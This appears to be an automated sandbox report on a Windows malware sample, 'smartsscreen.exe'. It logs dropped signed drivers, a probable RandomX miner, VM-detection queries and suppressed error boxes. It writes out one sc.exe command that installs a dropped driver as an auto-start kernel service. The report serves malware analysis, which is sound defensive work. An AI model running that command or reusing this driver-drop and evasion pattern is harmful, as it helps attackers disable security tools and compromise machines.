Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: dpx.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\curl.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: dpx.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: dpx.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\taskhostw.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\taskhostw.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\taskhostw.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\taskhostw.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\taskhostw.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\taskhostw.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\taskhostw.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\taskhostw.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\taskhostw.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\taskhostw.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\taskhostw.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\taskhostw.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\taskhostw.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\taskhostw.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\taskhostw.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\taskhostw.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\taskhostw.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\taskhostw.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: dpx.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: dpx.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Users\user\Desktop\smartsscreen.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: smartsscreen.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: smartsscreen.exe

Static file information: File size 4378624 > 1048576

Source: smartsscreen.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x3e8800

Source:	Binary string: D:\work\e0dd96435fde7cb0\BUILDS\Release\x64\aswArPot.pdb source: 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr
Source:	Binary string: D:\work\e0dd96435fde7cb0\BUILDS\Release\x64\aswArPot.pdbGCTL source: 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: expand.exe, 00000011.00000003.2034908138.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\projects\rarelyused\unlocker\iobitunlocker\driver\objfre_win7_amd64\amd64\IObitUnlocker.pdb source: expand.exe, 0000001F.00000003.2211860521.0000000002913000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\curl.exe

Code function: 5_2_00430450 strncpy,sscanf,strncpy,FreeLibrary,curl_slist_append,atoi,sscanf,WSAStartup,WSACleanup,curl_slist_free_all,curl_msnprintf,curl_slist_append,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetStdHandle,GetFileType,WaitForMultipleObjects,PeekNamedPipe,PeekNamedPipe,ReadFile,ReadFile,GetLastError,GetLastError,FreeLibrary,GetLastError,GetLastError,GetLastError,WSAGetLastError,WSAGetLastError,GetLastError,WSAGetLastError,FreeLibrary,

5_2_00430450

Source: smartsscreen.exe	Static PE information: section name: .symtab
Source: 8e77f5e1bc39c6408349bc8b0bfbe6cb.tmp.3.dr	Static PE information: section name: .eh_fram
Source: 85c52a8e2c82a64aa548c49d685fe8f4.tmp.11.dr	Static PE information: section name: _RANDOMX
Source: 85c52a8e2c82a64aa548c49d685fe8f4.tmp.11.dr	Static PE information: section name: _TEXT_CN
Source: 85c52a8e2c82a64aa548c49d685fe8f4.tmp.11.dr	Static PE information: section name: _TEXT_CN

Source: C:\Users\user\Desktop\curl.exe

Code function: 29_3_0083A07B push edx; retf

29_3_0083A0F4

Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Windows\system32\drivers\IObitUnlockers.sys (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\Desktop\32f5c1eec1ca463f8755c717d6e69bf8$dpx$.tmp\85c52a8e2c82a64aa548c49d685fe8f4.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\Desktop\taskhostw.exe (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Windows\system32\drivers\aswArPots.sys (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\Desktop\78996cc0913e428592859084f14a5a0d$dpx$.tmp\8e77f5e1bc39c6408349bc8b0bfbe6cb.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Windows\System32\drivers\72f5dad3d3e346df92d05eb16b52df1c$dpx$.tmp\0bfdc61464f46f4e9af5455e9b3ded61.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\Desktop\curl.exe (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Windows\System32\drivers\bb7302fc42eb479faf23a8d79ab6c5b2$dpx$.tmp\a9588d84e77073409fe455d00c8a6901.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\Desktop\68541119c9044a71965dd10779c37578$dpx$.tmp\e05c47e9a5ef7741a882c017cc284dab.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\Desktop\WinRing0x64.sys (copy)	Jump to dropped file

Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Windows\system32\drivers\IObitUnlockers.sys (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Windows\system32\drivers\aswArPots.sys (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Windows\System32\drivers\72f5dad3d3e346df92d05eb16b52df1c$dpx$.tmp\0bfdc61464f46f4e9af5455e9b3ded61.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Windows\System32\drivers\bb7302fc42eb479faf23a8d79ab6c5b2$dpx$.tmp\a9588d84e77073409fe455d00c8a6901.tmp	Jump to dropped file

Source: C:\Users\user\Desktop\smartsscreen.exe

Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe create aswArPots binPath= C:\Windows\System32\drivers\aswArPots.sys type= kernel start= auto

Source: C:\Users\user\Desktop\smartsscreen.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\taskhostw.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\taskhostw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\taskhostw.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\taskhostw.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\SysWOW64\expand.exe	Dropped PE file which has not been started: C:\Windows\system32\drivers\IObitUnlockers.sys (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	Dropped PE file which has not been started: C:\Windows\system32\drivers\aswArPots.sys (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	Dropped PE file which has not been started: C:\Windows\System32\drivers\72f5dad3d3e346df92d05eb16b52df1c$dpx$.tmp\0bfdc61464f46f4e9af5455e9b3ded61.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	Dropped PE file which has not been started: C:\Windows\System32\drivers\bb7302fc42eb479faf23a8d79ab6c5b2$dpx$.tmp\a9588d84e77073409fe455d00c8a6901.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WinRing0x64.sys (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\68541119c9044a71965dd10779c37578$dpx$.tmp\e05c47e9a5ef7741a882c017cc284dab.tmp	Jump to dropped file

Source: C:\Users\user\Desktop\curl.exe

API coverage: 2.7 %

Source: C:\Users\user\Desktop\smartsscreen.exe TID: 7336	Thread sleep count: 33 > 30			Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe TID: 7556	Thread sleep count: 76 > 30			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: taskhostw.exe, 00000013.00000002.4232842171.0000000000539000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
